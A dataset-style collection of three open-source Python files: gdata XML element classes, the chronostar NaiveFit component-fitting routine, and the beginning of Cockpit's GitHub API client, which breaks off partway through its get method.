class BatchInterrupted(atom.core.XmlElement):
"""The batch:interrupted element sent if batch request was interrupted.
Only appears in a feed if some of the batch entries could not be processed.
See: http://code.google.com/apis/gdata/batch.html#Handling_Errors
"""
_qname = BATCH_TEMPLATE % 'interrupted'
reason = 'reason'
success = 'success'
failures = 'failures'
parsed = 'parsed'
class BatchFeed(GDFeed):
"""A feed containing a list of batch request entries."""
interrupted = BatchInterrupted
entry = [BatchEntry]
def add_batch_entry(self, entry=None, id_url_string=None,
batch_id_string=None, operation_string=None):
"""Logic for populating members of a BatchEntry and adding to the feed.
If the entry is not a BatchEntry, it is converted to a BatchEntry so
that the batch specific members will be present.
The id_url_string can be used in place of an entry if the batch operation
applies to a URL. For example query and delete operations require just
the URL of an entry, no body is sent in the HTTP request. If an
id_url_string is sent instead of an entry, a BatchEntry is created and
added to the feed.
This method also assigns the desired batch id to the entry so that it
can be referenced in the server's response. If the batch_id_string is
None, this method will assign a batch_id to be the index at which this
entry will be in the feed's entry list.
Args:
entry: BatchEntry, atom.data.Entry, or another Entry flavor (optional)
The entry which will be sent to the server as part of the batch
request. The item must have a valid atom id so that the server
knows which entry this request references.
id_url_string: str (optional) The URL of the entry to be acted on. You
can find this URL in the text member of the atom id for an entry.
If an entry is not sent, this id will be used to construct a new
BatchEntry which will be added to the request feed.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. Note that batch_ids should either always be specified or
never, mixing could potentially result in duplicate batch ids.
operation_string: str (optional) The desired batch operation which will
set the batch_operation.type member of the entry. Options are
'insert', 'update', 'delete', and 'query'
Raises:
MissingRequiredParameters: Raised if neither an id_ url_string nor an
entry are provided in the request.
Returns:
The added entry.
"""
if entry is None and id_url_string is None:
raise MissingRequiredParameters('supply either an entry or URL string')
if entry is None and id_url_string is not None:
entry = BatchEntry(id=atom.data.Id(text=id_url_string))
if batch_id_string is not None:
entry.batch_id = BatchId(text=batch_id_string)
elif entry.batch_id is None or entry.batch_id.text is None:
entry.batch_id = BatchId(text=str(len(self.entry)))
if operation_string is not None:
entry.batch_operation = BatchOperation(type=operation_string)
self.entry.append(entry)
return entry
AddBatchEntry = add_batch_entry
def add_insert(self, entry, batch_id_string=None):
"""Add an insert request to the operations in this batch request feed.
If the entry doesn't yet have an operation or a batch id, these will
be set to the insert operation and a batch_id specified as a parameter.
Args:
entry: BatchEntry The entry which will be sent in the batch feed as an
insert request.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. Note that batch_ids should either always be specified or
never, mixing could potentially result in duplicate batch ids.
"""
self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
operation_string=BATCH_INSERT)
AddInsert = add_insert
def add_update(self, entry, batch_id_string=None):
"""Add an update request to the list of batch operations in this feed.
Sets the operation type of the entry to insert if it is not already set
and assigns the desired batch id to the entry so that it can be
referenced in the server's response.
Args:
entry: BatchEntry The entry which will be sent to the server as an
update (HTTP PUT) request. The item must have a valid atom id
so that the server knows which entry to replace.
batch_id_string: str (optional) The batch ID to be used to reference
this batch operation in the results feed. If this parameter is None,
the current length of the feed's entry array will be used as a
count. See also comments for AddInsert.
"""
self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
operation_string=BATCH_UPDATE)
AddUpdate = add_update
def add_delete(self, url_string=None, entry=None, batch_id_string=None):
"""Adds a delete request to the batch request feed.
This method takes either the url_string which is the atom id of the item
to be deleted, or the entry itself. The atom id of the entry must be
present so that the server knows which entry should be deleted.
Args:
url_string: str (optional) The URL of the entry to be deleted. You can
find this URL in the text member of the atom id for an entry.
entry: BatchEntry (optional) The entry to be deleted.
batch_id_string: str (optional)
Raises:
MissingRequiredParameters: Raised if neither a url_string nor an entry
are provided in the request.
"""
self.add_batch_entry(entry=entry, id_url_string=url_string,
batch_id_string=batch_id_string, operation_string=BATCH_DELETE)
AddDelete = add_delete
def add_query(self, url_string=None, entry=None, batch_id_string=None):
"""Adds a query request to the batch request feed.
This method takes either the url_string which is the query URL
whose results will be added to the result feed. The query URL will
be encapsulated in a BatchEntry, and you may pass in the BatchEntry
with a query URL instead of sending a url_string.
Args:
url_string: str (optional)
entry: BatchEntry (optional)
batch_id_string: str (optional)
Raises:
MissingRequiredParameters
"""
self.add_batch_entry(entry=entry, id_url_string=url_string,
batch_id_string=batch_id_string, operation_string=BATCH_QUERY)
AddQuery = add_query
def find_batch_link(self):
return self.find_url('http://schemas.google.com/g/2005#batch')
FindBatchLink = find_batch_link
class EntryLink(atom.core.XmlElement):
"""The gd:entryLink element.
Represents a logically nested entry. For example, a <gd:who>
representing a contact might have a nested entry from a contact feed.
"""
_qname = GDATA_TEMPLATE % 'entryLink'
entry = GDEntry
rel = 'rel'
read_only = 'readOnly'
href = 'href'
class FeedLink(atom.core.XmlElement):
"""The gd:feedLink element.
Represents a logically nested feed. For example, a calendar feed might
have a nested feed representing all comments on entries.
"""
_qname = GDATA_TEMPLATE % 'feedLink'
feed = GDFeed
rel = 'rel'
read_only = 'readOnly'
count_hint = 'countHint'
href = 'href'
class AdditionalName(atom.core.XmlElement):
"""The gd:additionalName element.
Specifies additional (eg. middle) name of the person.
Contains an attribute for the phonetic representaton of the name.
"""
_qname = GDATA_TEMPLATE % 'additionalName'
yomi = 'yomi'
class Comments(atom.core.XmlElement):
"""The gd:comments element.
Contains a comments feed for the enclosing entry (such as a calendar event).
"""
_qname = GDATA_TEMPLATE % 'comments'
rel = 'rel'
feed_link = FeedLink
class Country(atom.core.XmlElement):
"""The gd:country element.
Country name along with optional country code. The country code is
given in accordance with ISO 3166-1 alpha-2:
http://www.iso.org/iso/iso-3166-1_decoding_table
"""
_qname = GDATA_TEMPLATE % 'country'
code = 'code'
class EmailImParent(atom.core.XmlElement):
address = 'address'
label = 'label'
rel = 'rel'
primary = 'primary'
class Email(EmailImParent):
"""The gd:email element.
An email address associated with the containing entity (which is
usually an entity representing a person or a location).
"""
_qname = GDATA_TEMPLATE % 'email'
display_name = 'displayName'
class FamilyName(atom.core.XmlElement):
"""The gd:familyName element.
Specifies family name of the person, eg. "Smith".
"""
_qname = GDATA_TEMPLATE % 'familyName'
yomi = 'yomi'
class Im(EmailImParent):
"""The gd:im element.
An instant messaging address associated with the containing entity.
"""
_qname = GDATA_TEMPLATE % 'im'
protocol = 'protocol'
class GivenName(atom.core.XmlElement):
"""The gd:givenName element.
Specifies given name of the person, eg. "John".
"""
_qname = GDATA_TEMPLATE % 'givenName'
yomi = 'yomi'
class NamePrefix(atom.core.XmlElement):
"""The gd:namePrefix element.
Honorific prefix, eg. 'Mr' or 'Mrs'.
"""
_qname = GDATA_TEMPLATE % 'namePrefix'
class NameSuffix(atom.core.XmlElement):
"""The gd:nameSuffix element.
Honorific suffix, eg. 'san' or 'III'.
"""
_qname = GDATA_TEMPLATE % 'nameSuffix'
class FullName(atom.core.XmlElement):
"""The gd:fullName element.
Unstructured representation of the name.
"""
_qname = GDATA_TEMPLATE % 'fullName'
class Name(atom.core.XmlElement):
"""The gd:name element.
Allows storing person's name in a structured way. Consists of
given name, additional name, family name, prefix, suffix and full name.
"""
_qname = GDATA_TEMPLATE % 'name'
given_name = GivenName
additional_name = AdditionalName
family_name = FamilyName
name_prefix = NamePrefix
name_suffix = NameSuffix
full_name = FullName
class OrgDepartment(atom.core.XmlElement):
"""The gd:orgDepartment element.
Describes a department within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgDepartment'
class OrgJobDescription(atom.core.XmlElement):
"""The gd:orgJobDescription element.
Describes a job within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgJobDescription'
class OrgName(atom.core.XmlElement):
"""The gd:orgName element.
The name of the organization. Must appear within a gd:organization
element.
Contains a Yomigana attribute (Japanese reading aid) for the
organization name.
"""
_qname = GDATA_TEMPLATE % 'orgName'
yomi = 'yomi'
class OrgSymbol(atom.core.XmlElement):
"""The gd:orgSymbol element.
Provides a symbol of an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgSymbol'
class OrgTitle(atom.core.XmlElement):
"""The gd:orgTitle element.
The title of a person within an organization. Must appear within a
gd:organization element.
"""
_qname = GDATA_TEMPLATE % 'orgTitle'
class Organization(atom.core.XmlElement):
"""The gd:organization element.
An organization, typically associated with a contact.
"""
_qname = GDATA_TEMPLATE % 'organization'
label = 'label'
primary = 'primary'
rel = 'rel'
department = OrgDepartment
job_description = OrgJobDescription
name = OrgName
symbol = OrgSymbol
title = OrgTitle
class When(atom.core.XmlElement):
"""The gd:when element.
Represents a period of time or an instant.
"""
_qname = GDATA_TEMPLATE % 'when'
end = 'endTime'
start = 'startTime'
value = 'valueString'
class OriginalEvent(atom.core.XmlElement):
"""The gd:originalEvent element.
Equivalent to the Recurrence ID property specified in section 4.8.4.4
of RFC 2445. Appears in every instance of a recurring event, to identify
the original event.
Contains a <gd:when> element specifying the original start time of the
instance that has become an exception.
"""
_qname = GDATA_TEMPLATE % 'originalEvent'
id = 'id'
href = 'href'
when = When
class PhoneNumber(atom.core.XmlElement):
"""The gd:phoneNumber element.
A phone number associated with the containing entity (which is usually
an entity representing a person or a location).
"""
_qname = GDATA_TEMPLATE % 'phoneNumber'
label = 'label'
rel = 'rel'
uri = 'uri'
primary = 'primary'
class PostalAddress(atom.core.XmlElement):
"""The gd:postalAddress element."""
_qname = GDATA_TEMPLATE % 'postalAddress'
label = 'label'
rel = 'rel'
uri = 'uri'
primary = 'primary'
class Rating(atom.core.XmlElement):
"""The gd:rating element.
Represents a numeric rating of the enclosing entity, such as a
comment. Each rating supplies its own scale, although it may be
normalized by a service; for example, some services might convert all
ratings to a scale from 1 to 5.
"""
_qname = GDATA_TEMPLATE % 'rating'
average = 'average'
max = 'max'
min = 'min'
num_raters = 'numRaters'
rel = 'rel'
value = 'value'
class Recurrence(atom.core.XmlElement):
"""The gd:recurrence element.
Represents the dates and times when a recurring event takes place.
The string that defines the recurrence consists of a set of properties,
each of which is defined in the iCalendar standard (RFC 2445).
Specifically, the string usually begins with a DTSTART property that
indicates the starting time of the first instance of the event, and
often a DTEND property or a DURATION property to indicate when the
first instance ends. Next come RRULE, RDATE, EXRULE, and/or EXDATE
properties, which collectively define a recurring event and its
exceptions (but see below). (See section 4.8.5 of RFC 2445 for more
information about these recurrence component properties.) Last comes a
VTIMEZONE component, providing detailed timezone rules for any timezone
ID mentioned in the preceding properties.
Google services like Google Calendar don't generally generate EXRULE
and EXDATE properties to represent exceptions to recurring events;
instead, they generate <gd:recurrenceException> elements. However,
Google services may include EXRULE and/or EXDATE properties anyway;
for example, users can import events and exceptions into Calendar, and
if those imported events contain EXRULE or EXDATE properties, then
Calendar will provide those properties when it sends a <gd:recurrence>
element.
Note the the use of <gd:recurrenceException> means that you can't be
sure just from examining a <gd:recurrence> element whether there are
any exceptions to the recurrence description. To ensure that you find
all exceptions, look for <gd:recurrenceException> elements in the feed,
and use their <gd:originalEvent> elements to match them up with
<gd:recurrence> elements.
"""
_qname = GDATA_TEMPLATE % 'recurrence'
class RecurrenceException(atom.core.XmlElement):
"""The gd:recurrenceException element.
Represents an event that's an exception to a recurring event-that is,
an instance of a recurring event in which one or more aspects of the
recurring event (such as attendance list, time, or location) have been
changed.
Contains a <gd:originalEvent> element that specifies the original
recurring event that this event is an exception to.
When you change an instance of a recurring event, that instance becomes
an exception. Depending on what change you made to it, the exception
behaves in either of two different ways when the original recurring
event is changed:
- If you add, change, or remove comments, attendees, or attendee
responses, then the exception remains tied to the original event, and
changes to the original event also change the exception.
- If you make any other changes to the exception (such as changing the
time or location) then the instance becomes "specialized," which means
that it's no longer as tightly tied to the original event. If you
change the original event, specialized exceptions don't change. But
see below.
For example, say you have a meeting every Tuesday and Thursday at
2:00 p.m. If you change the attendance list for this Thursday's meeting
(but not for the regularly scheduled meeting), then it becomes an
exception. If you change the time for this Thursday's meeting (but not
for the regularly scheduled meeting), then it becomes specialized.
Regardless of whether an exception is specialized or not, if you do
something that deletes the instance that the exception was derived from,
then the exception is deleted. Note that changing the day or time of a
recurring event deletes all instances, and creates new ones.
For example, after you've specialized this Thursday's meeting, say you
change the recurring meeting to happen on Monday, Wednesday, and Friday.
That change deletes all of the recurring instances of the
Tuesday/Thursday meeting, including the specialized one.
If a particular instance of a recurring event is deleted, then that
instance appears as a <gd:recurrenceException> containing a
<gd:entryLink> that has its <gd:eventStatus> set to
"http://schemas.google.com/g/2005#event.canceled". (For more
information about canceled events, see RFC 2445.)
"""
_qname = GDATA_TEMPLATE % 'recurrenceException'
specialized = 'specialized'
entry_link = EntryLink
original_event = OriginalEvent
class Reminder(atom.core.XmlElement):
"""The gd:reminder element.
A time interval, indicating how long before the containing entity's start
time or due time attribute a reminder should be issued. Alternatively,
may specify an absolute time at which a reminder should be issued. Also
specifies a notification method, indicating what medium the system
should use to remind the user.
"""
_qname = GDATA_TEMPLATE % 'reminder'
absolute_time = 'absoluteTime'
method = 'method'
days = 'days'
hours = 'hours'
minutes = 'minutes'
class Transparency(atom.core.XmlElement):
"""The gd:transparency element:
Extensible enum corresponding to the TRANSP property defined in RFC 244.
"""
_qname = GDATA_TEMPLATE % 'transparency'
value = 'value'
class Agent(atom.core.XmlElement):
"""The gd:agent element.
The agent who actually receives the mail. Used in work addresses.
Also for 'in care of' or 'c/o'.
"""
_qname = GDATA_TEMPLATE % 'agent'
class HouseName(atom.core.XmlElement):
"""The gd:housename element.
Used in places where houses or buildings have names (and not
necessarily numbers), eg. "The Pillars".
"""
_qname = GDATA_TEMPLATE % 'housename'
class Street(atom.core.XmlElement):
"""The gd:street element.
Can be street, avenue, road, etc. This element also includes the
house number and room/apartment/flat/floor number.
"""
_qname = GDATA_TEMPLATE % 'street'
class PoBox(atom.core.XmlElement):
"""The gd:pobox element.
Covers actual P.O. boxes, drawers, locked bags, etc. This is usually
but not always mutually exclusive with street.
"""
_qname = GDATA_TEMPLATE % 'pobox'
class Neighborhood(atom.core.XmlElement):
"""The gd:neighborhood element.
This is used to disambiguate a street address when a city contains more
than one street with the same name, or to specify a small place whose
mail is routed through a larger postal town. In China it could be a
county or a minor city.
"""
_qname = GDATA_TEMPLATE % 'neighborhood'
class City(atom.core.XmlElement):
"""The gd:city element.
Can be city, village, town, borough, etc. This is the postal town and
not necessarily the place of residence or place of business.
"""
_qname = GDATA_TEMPLATE % 'city'
class Subregion(atom.core.XmlElement):
"""The gd:subregion element.
Handles administrative districts such as U.S. or U.K. counties that are
not used for mail addressing purposes. Subregion is not intended for
delivery addresses.
"""
_qname = GDATA_TEMPLATE % 'subregion'
class Region(atom.core.XmlElement):
"""The gd:region element.
A state, province, county (in Ireland), Land (in Germany),
departement (in France), etc.
"""
_qname = GDATA_TEMPLATE % 'region'
class Postcode(atom.core.XmlElement):
"""The gd:postcode element.
Postal code. Usually country-wide, but sometimes specific to the
city (e.g. "2" in "Dublin 2, Ireland" addresses).
"""
_qname = GDATA_TEMPLATE % 'postcode'
class Country(atom.core.XmlElement):
"""The gd:country element.
The name or code of the country.
"""
_qname = GDATA_TEMPLATE % 'country'
class FormattedAddress(atom.core.XmlElement):
"""The gd:formattedAddress element.
The full, unstructured postal address.
"""
_qname = GDATA_TEMPLATE % 'formattedAddress'
class StructuredPostalAddress(atom.core.XmlElement):
"""The gd:structuredPostalAddress element.
Postal address split into components. It allows to store the address
in locale independent format. The fields can be interpreted and used
to generate formatted, locale dependent address. The following elements
reperesent parts of the address: agent, house name, street, P.O. box,
neighborhood, city, subregion, region, postal code, country. The
subregion element is not used for postal addresses, it is provided for
extended uses of addresses only. In order to store postal address in an
unstructured form formatted address field is provided.
"""
_qname = GDATA_TEMPLATE % 'structuredPostalAddress'
rel = 'rel'
mail_class = 'mailClass'
usage = 'usage'
label = 'label'
primary = 'primary'
agent = Agent
house_name = HouseName
street = Street
po_box = PoBox
neighborhood = Neighborhood
city = City
subregion = Subregion
region = Region
postcode = Postcode
country = Country
formatted_address = FormattedAddress
class Where(atom.core.XmlElement):
"""The gd:where element.
A place (such as an event location) associated with the containing
entity. The type of the association is determined by the rel attribute;
the details of the location are contained in an embedded or linked-to
Contact entry.
A <gd:where> element is more general than a <gd:geoPt> element. The
former identifies a place using a text description and/or a Contact
entry, while the latter identifies a place using a specific geographic
location.
"""
_qname = GDATA_TEMPLATE % 'where'
label = 'label'
rel = 'rel'
value = 'valueString'
entry_link = EntryLink
class AttendeeType(atom.core.XmlElement):
"""The gd:attendeeType element."""
_qname = GDATA_TEMPLATE % 'attendeeType'
value = 'value'
class AttendeeStatus(atom.core.XmlElement):
"""The gd:attendeeStatus element."""
_qname = GDATA_TEMPLATE % 'attendeeStatus'
value = 'value'
class EventStatus(atom.core.XmlElement):
"""The gd:eventStatus element."""
_qname = GDATA_TEMPLATE % 'eventStatus'
value = 'value'
class Visibility(atom.core.XmlElement):
"""The gd:visibility element."""
_qname = GDATA_TEMPLATE % 'visibility'
value = 'value'
class Who(atom.core.XmlElement):
"""The gd:who element.
A person associated with the containing entity. The type of the
association is determined by the rel attribute; the details about the
person are contained in an embedded or linked-to Contact entry.
The <gd:who> element can be used to specify email senders and
recipients, calendar event organizers, and so on.
"""
_qname = GDATA_TEMPLATE % 'who'
email = 'email'
rel = 'rel'
value = 'valueString'
attendee_status = AttendeeStatus
attendee_type = AttendeeType
entry_link = EntryLink
class Deleted(atom.core.XmlElement):
"""gd:deleted when present, indicates the containing entry is deleted."""
_qname = GD_TEMPLATE % 'deleted'
class Money(atom.core.XmlElement):
"""Describes money"""
_qname = GD_TEMPLATE % 'money'
amount = 'amount'
currency_code = 'currencyCode'
class MediaSource(object):
"""GData Entries can refer to media sources, so this class provides a
place to store references to these objects along with some metadata.
"""
def __init__(self, file_handle=None, content_type=None, content_length=None,
file_path=None, file_name=None):
"""Creates an object of type MediaSource.
Args:
file_handle: A file handle pointing to the file to be encapsulated in the
MediaSource.
content_type: string The MIME type of the file. Required if a file_handle
is given.
content_length: int The size of the file. Required if a file_handle is
given.
file_path: string (optional) A full path name to the file. Used in
place of a file_handle.
file_name: string The name of the file without any path information.
Required if a file_handle is given.
"""
self.file_handle = file_handle
self.content_type = content_type
self.content_length = content_length
self.file_name = file_name
if (file_handle is None and content_type is not None and
file_path is not None):
self.set_file_handle(file_path, content_type)
def set_file_handle(self, file_name, content_type):
"""A helper function which can create a file handle from a given filename
and set the content type and length all at once.
Args:
file_name: string The path and file name to the file containing the media
content_type: string A MIME type representing the type of the media
"""
self.file_handle = open(file_name, 'rb')
self.content_type = content_type
self.content_length = os.path.getsize(file_name)
self.file_name = os.path.basename(file_name)
SetFileHandle = set_file_handle
def modify_request(self, http_request):
http_request.add_body_part(self.file_handle, self.content_type,
self.content_length)
return http_request
ModifyRequest = modify_request
| apache-2.0 |
mikeireland/chronostar | chronostar/naivefit.py | 1 | 10262 | """
naivefit.py
A NaiveFit follows the approach described in Crundall et al. (2019).
NaiveFit begins with an initial guess provided by user of an N component fit.
If no guess is provided, all provided stars are assumed to be members of one
component.
NaiveFit will perform an Expectation Maximisation on this N component fit until
converged.
Then NaiveFit will test increasing the compoennt count to N+1. This is done by
for each component out of the N existing, substituting it for 2 similar
components with slight age offsets, and running an EM fit. The result
is N separate "N+1 component" fits. The best one will be compared to the
"N component" fit using the Bayesian Information Criterion (BIC). If the
BIC has improved, this "N+1 component fit" will be taken as the best fit so far.
This process iterates until adding a component fails to yield a better fit.
"""
import numpy as np
import os
import sys
import logging
from distutils.dir_util import mkpath
import random
import uuid
#~ from emcee.utils import MPIPool
from multiprocessing import Pool
from multiprocessing import cpu_count
sys.path.insert(0, os.path.abspath('..'))
from . import expectmax
from . import readparam
from . import tabletool
from . import component
from . import traceorbit
from chronostar.parentfit import ParentFit
# python3 throws FileNotFoundError that is essentially the same as IOError
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
#ACW: put these into a helper module /start
def dummy_trace_orbit_func(loc, times=None):
"""
Purely for testing purposes
Dummy trace orbit func to skip irrelevant computation
A little constraint on age (since otherwise its a free floating
parameter)
"""
if times is not None:
if np.all(times > 1.):
return loc + 1000.
return loc
def log_message(msg, symbol='.', surround=False):
"""Little formatting helper"""
res = '{}{:^40}{}'.format(5 * symbol, msg, 5 * symbol)
if surround:
res = '\n{}\n{}\n{}'.format(50 * symbol, res, 50 * symbol)
logging.info(res)
#ACW: /end
class NaiveFit(ParentFit):
def __init__(self, fit_pars):
"""
Parameters
----------
fit_pars : str -or- dictionary
If a string, `fit_pars` should be a path to a parameter file which
can be parsed by readparam.readParam, to construct a dictionary.
Alternatively, an actual dictionary can be passed in. See README.md
for a description of parameters.
"""
super(NaiveFit, self).__init__(fit_pars)
def run_fit(self):
"""
Perform a fit (as described in Paper I) to a set of prepared data.
Results are outputted as two dictionaries
results = {'comps':best_fit, (list of components)
'med_and_spans':median and spans of model parameters,
'memb_probs': membership probability array (the standard one)}
scores = {'bic': the bic,
'lnlike': log likelihood of that run,
'lnpost': log posterior of that run}
"""
log_message('Beginning Chronostar run',
symbol='_', surround=True)
# ------------------------------------------------------------
# ----- EXECUTE RUN ----------------------------------------
# ------------------------------------------------------------
if self.fit_pars['store_burnin_chains']:
log_message(msg='Storing burnin chains', symbol='-')
# ACW: Make this a function (~50 lines)
# ------------------------------------------------------------
# ----- STAGE 1: ESTABLISHING INITIAL FIT -----------
# ------------------------------------------------------------
# Handle special case of very first run
# Either by fitting one component (default) or by using `init_comps`
# to initialise the EM fit.
# Check if not provided with init comps or membs
if (self.fit_pars['init_comps'] is None) and (self.fit_pars['init_memb_probs'] is None):
# NaiveFit doesn't know how to blindly intiialise runs with ncomps > 1
assert self.ncomps == 1, 'If no initialisation set, can only accept ncomp==1'
# If no init conditions provided, assume all stars are members and begine
# fit with 1 component.
init_memb_probs = np.zeros((len(self.data_dict['means']),
self.ncomps + self.fit_pars[
'use_background']))
init_memb_probs[:, 0] = 1. - 1.e-10
init_memb_probs[:, 1] = 1.e-10
self.fit_pars['init_memb_probs'] = init_memb_probs
log_message(msg='No initial information provided', symbol='-')
log_message(msg='Assuming all stars are members', symbol='-')
# Otherwise, we must have been given an init_comps, or an init_memb_probs
# to start things with
else:
log_message(msg='Initialising with init_comps or init_memb_probs with'
'%i components'%self.ncomps, symbol='*', surround=True)
pass
# MZ: just testing. Delete after if works
print("self.fit_pars['init_memb_probs']", self.fit_pars['init_memb_probs'])
print("self.fit_pars['init_comps']", self.fit_pars['init_comps'])
log_message(msg='FITTING {} COMPONENT'.format(self.ncomps),
symbol='*', surround=True)
run_dir = self.rdir + '{}/'.format(self.ncomps)
prev_result = self.run_em_unless_loadable(run_dir)
prev_score = self.calc_score(
prev_result['comps'], prev_result['memb_probs'],
use_box_background=self.fit_pars['use_box_background']
)
self.ncomps += 1
# ------------------------------------------------------------
# ----- STAGE 2: EXPLORE EXTRA COMPONENT BY DECOMPOSITION --
# ------------------------------------------------------------
# Calculate global score of fit for comparison with future fits with different
# component counts
# Begin iterative loop, each time trialing the incorporation of a new component
#
# `prev_result` track the previous fit, which is taken to be
# the best fit so far
#
# As new fits are acquired, we call them `new_result`.
# The new fits are compared against the previous fit, and if determined to
# be an improvement, they are taken as the best fit, and are renamed to
# `prev_result`
stage_2_ncomps = 2
while stage_2_ncomps <= self.fit_pars['max_comp_count']:
log_message(msg='FITTING {} COMPONENT'.format(stage_2_ncomps),
symbol='*', surround=True)
all_results = []
all_scores = []
# Iteratively try subdividing each previous component
# target_comp is the component we will split into two.
# This will make a total of ncomps (the target comp split into 2,
# plus the remaining components from prev_result['comps']
for i, target_comp in enumerate(prev_result['comps']):
div_label = chr(ord('A') + i)
run_dir = self.rdir + '{}/{}/'.format(stage_2_ncomps, div_label)
log_message(msg='Subdividing stage {}'.format(div_label),
symbol='+', surround=True)
mkpath(run_dir)
self.fit_pars['init_comps'] = self.build_init_comps(
prev_result['comps'], split_comp_ix=i,
prev_med_and_spans=prev_result['med_and_spans'],
memb_probs = prev_result['memb_probs'])
self.ncomps = len(self.fit_pars['init_comps'])
result = self.run_em_unless_loadable(run_dir)
all_results.append(result)
score = self.calc_score(
result['comps'], result['memb_probs'],
use_box_background=self.fit_pars['use_box_background']
)
all_scores.append(score)
logging.info(
'Decomposition {} finished with \nBIC: {}\nlnlike: {}\n'
'lnpost: {}'.format(
div_label, all_scores[-1]['bic'],
all_scores[-1]['lnlike'], all_scores[-1]['lnpost'],
))
# ------------------------------------------------------------
# ----- STAGE 2a: COMBINE RESULTS OF EACH GOOD SPLIT -------
# ------------------------------------------------------------
# identify all the improving splits
all_bics = np.array([score['bic'] for score in all_scores])
best_split_ix = np.nanargmin(all_bics)
new_result = all_results[best_split_ix]
new_score = all_scores[best_split_ix]
self.iter_end_log(best_split_ix, prev_result=prev_result, new_result=new_result)
# Check if the fit has improved
self.log_score_comparison(new=new_score,
prev=prev_score)
if new_score['bic'] < prev_score['bic']:
prev_score = new_score
prev_result = new_result
stage_2_ncomps += 1
log_message(msg="Commencing {} component fit on {}{}".format(
self.ncomps, self.ncomps - 1,
chr(ord('A') + best_split_ix)), symbol='+'
)
else:
# WRITING THE FINAL RESULTS INTO FILES
self.write_results_to_file(prev_result, prev_score)
break
logging.info("Best fit:\n{}".format(
[group.get_pars() for group in prev_result['comps']]))
if stage_2_ncomps >= self.fit_pars['max_comp_count']:
log_message(msg='REACHED MAX COMP LIMIT', symbol='+',
surround=True)
return prev_result, prev_score
| mit |
SotolitoLabs/cockpit | bots/task/github.py | 2 | 13357 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# This file is part of Cockpit.
#
# Copyright (C) 2015 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
# Shared GitHub code. When run as a script, we print out info about
# our GitHub interacition.
import errno
import http.client
import json
import os
import socket
import sys
import time
import urllib.parse
from . import cache
__all__ = (
'GitHub',
'Checklist',
'TESTING',
'NO_TESTING',
'NOT_TESTED'
)
TESTING = "Testing in progress"
NOT_TESTED = "Not yet tested"
NO_TESTING = "Manual testing required"
OUR_CONTEXTS = [
"verify/",
"avocado/",
"container/",
"selenium/",
# generic prefix for external repos
"cockpit/",
]
ISSUE_TITLE_IMAGE_REFRESH = "Image refresh for {0}"
BASE = os.path.normpath(os.path.join(os.path.dirname(__file__), "..", ".."))
TOKEN = "~/.config/github-token"
TEAM_CONTRIBUTORS = "Contributors"
def known_context(context):
for prefix in OUR_CONTEXTS:
if context.startswith(prefix):
return True
return False
class Logger(object):
def __init__(self, directory):
hostname = socket.gethostname().split(".")[0]
month = time.strftime("%Y%m")
self.path = os.path.join(directory, "{0}-{1}.log".format(hostname, month))
if not os.path.exists(directory):
os.makedirs(directory)
# Yes, we open the file each time
def write(self, value):
with open(self.path, 'a') as f:
f.write(value)
class GitHub(object):
def __init__(self, base=None, cacher=None, repo=None):
if base is None:
if repo is None:
repo = os.environ.get("GITHUB_BASE", "cockpit-project/cockpit")
netloc = os.environ.get("GITHUB_API", "https://api.github.com")
base = "{0}/repos/{1}/".format(netloc, repo)
self.url = urllib.parse.urlparse(base)
self.conn = None
self.token = None
self.debug = False
try:
gt = open(os.path.expanduser(TOKEN), "r")
self.token = gt.read().strip()
gt.close()
except IOError as exc:
if exc.errno == errno.ENOENT:
pass
else:
raise
self.available = self.token and True or False
# The cache directory is $TEST_DATA/github ~/.cache/github
if not cacher:
data = os.environ.get("TEST_DATA", os.path.expanduser("~/.cache"))
cacher = cache.Cache(os.path.join(data, "github"))
self.cache = cacher
# Create a log for debugging our GitHub access
self.log = Logger(self.cache.directory)
self.log.write("")
def qualify(self, resource):
return urllib.parse.urljoin(self.url.path, resource)
def request(self, method, resource, data="", headers=None):
if headers is None:
headers = { }
headers["User-Agent"] = "Cockpit Tests"
if self.token:
headers["Authorization"] = "token " + self.token
connected = False
while not connected:
if not self.conn:
if self.url.scheme == 'http':
self.conn = http.client.HTTPConnection(self.url.netloc)
else:
self.conn = http.client.HTTPSConnection(self.url.netloc)
connected = True
self.conn.set_debuglevel(self.debug and 1 or 0)
try:
self.conn.request(method, self.qualify(resource), data, headers)
response = self.conn.getresponse()
break
# This happens when GitHub disconnects in python3
except ConnectionResetError:
if connected:
raise
self.conn = None
# This happens when GitHub disconnects a keep-alive connection
except http.client.BadStatusLine:
if connected:
raise
self.conn = None
# This happens when TLS is the source of a disconnection
except socket.error as ex:
if connected or ex.errno != errno.EPIPE:
raise
self.conn = None
heads = { }
for (header, value) in response.getheaders():
heads[header.lower()] = value
self.log.write('{0} - - [{1}] "{2} {3} HTTP/1.1" {4} -\n'.format(
self.url.netloc,
time.asctime(),
method,
resource,
response.status
))
return {
"status": response.status,
"reason": response.reason,
"headers": heads,
"data": response.read().decode('utf-8')
}
def get(self, resource):
headers = { }
qualified = self.qualify(resource)
cached = self.cache.read(qualified)
if cached:
if self.cache.current(qualified):
return json.loads(cached['data'] or "null")
etag = cached['headers'].get("etag", None)
modified = cached['headers'].get("last-modified", None)
if etag:
headers['If-None-Match'] = etag
elif modified:
headers['If-Modified-Since'] = modified
response = self.request("GET", resource, "", headers)
if response['status'] == 404:
return None
elif cached and response['status'] == 304: # Not modified
self.cache.write(qualified, cached)
return json.loads(cached['data'] or "null")
elif response['status'] < 200 or response['status'] >= 300:
